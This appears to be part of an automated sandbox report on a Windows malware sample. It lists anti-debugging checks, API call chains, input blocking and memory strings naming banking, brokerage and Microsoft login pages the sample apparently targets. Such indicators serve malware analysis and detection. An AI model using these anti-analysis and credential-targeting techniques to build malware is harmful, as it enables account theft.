Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A1BAB0 FindFirstFileW,FindNextFileW,FindClose, 4_2_00A1BAB0
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BC4AFE
Source: F56GKLK7U4.4.dr Binary or memory string: dev.azure.comVMware20,11696497155j
Source: F56GKLK7U4.4.dr Binary or memory string: global block list test formVMware20,11696497155
Source: F56GKLK7U4.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3914462258.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: F56GKLK7U4.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: F56GKLK7U4.4.dr Binary or memory string: tasks.office.comVMware20,11696497155o
Source: F56GKLK7U4.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1875805325.000001FD7885C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: F56GKLK7U4.4.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: F56GKLK7U4.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: F56GKLK7U4.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: F56GKLK7U4.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: F56GKLK7U4.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: F56GKLK7U4.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: F56GKLK7U4.4.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: F56GKLK7U4.4.dr Binary or memory string: AMC password management pageVMware20,11696497155
Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: F56GKLK7U4.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: F56GKLK7U4.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: F56GKLK7U4.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: F56GKLK7U4.4.dr Binary or memory string: discord.comVMware20,11696497155f
Source: F56GKLK7U4.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: F56GKLK7U4.4.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: F56GKLK7U4.4.dr Binary or memory string: outlook.office.comVMware20,11696497155s
Source: F56GKLK7U4.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: F56GKLK7U4.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: F56GKLK7U4.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\Desktop\150-425-2024.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\150-425-2024.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0327096E rdtsc 2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00617823 LdrLoadDll, 2_2_00617823
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C341FD BlockInput, 0_2_00C341FD
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00BC3B4C
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BF5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00BF5CCC
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C3C304 LoadLibraryA,GetProcAddress, 0_2_00C3C304
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_038D3500 mov eax, dword ptr fs:[00000030h] 0_2_038D3500
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_038D3560 mov eax, dword ptr fs:[00000030h] 0_2_038D3560
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_038D1ED0 mov eax, dword ptr fs:[00000030h] 0_2_038D1ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] 2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] 2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] 2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h] 2_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h] 2_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h] 2_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] 2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h] 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] 2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h] 2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h] 2_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] 2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] 2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] 2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h] 2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h] 2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] 2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] 2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] 2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h] 2_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h] 2_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] 2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] 2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] 2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] 2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h] 2_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] 2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] 2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] 2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h] 2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h] 2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h] 2_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] 2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] 2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] 2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h] 2_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h] 2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h] 2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h] 2_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h] 2_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h] 2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h] 2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h] 2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h] 2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h] 2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h] 2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] 2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] 2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] 2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] 2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] 2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] 2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h] 2_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h] 2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] 2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] 2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] 2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h] 2_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h] 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h] 2_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h] 2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h] 2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h] 2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h] 2_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h] 2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h] 2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h] 2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h] 2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] 2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] 2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] 2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] 2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] 2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] 2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] 2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h] 2_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h] 2_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h] 2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h] 2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h] 2_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h] 2_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h] 2_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h] 2_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] 2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] 2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] 2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] 2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h] 2_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h] 2_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h] 2_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h] 2_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h] 2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h] 2_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0322A0E3
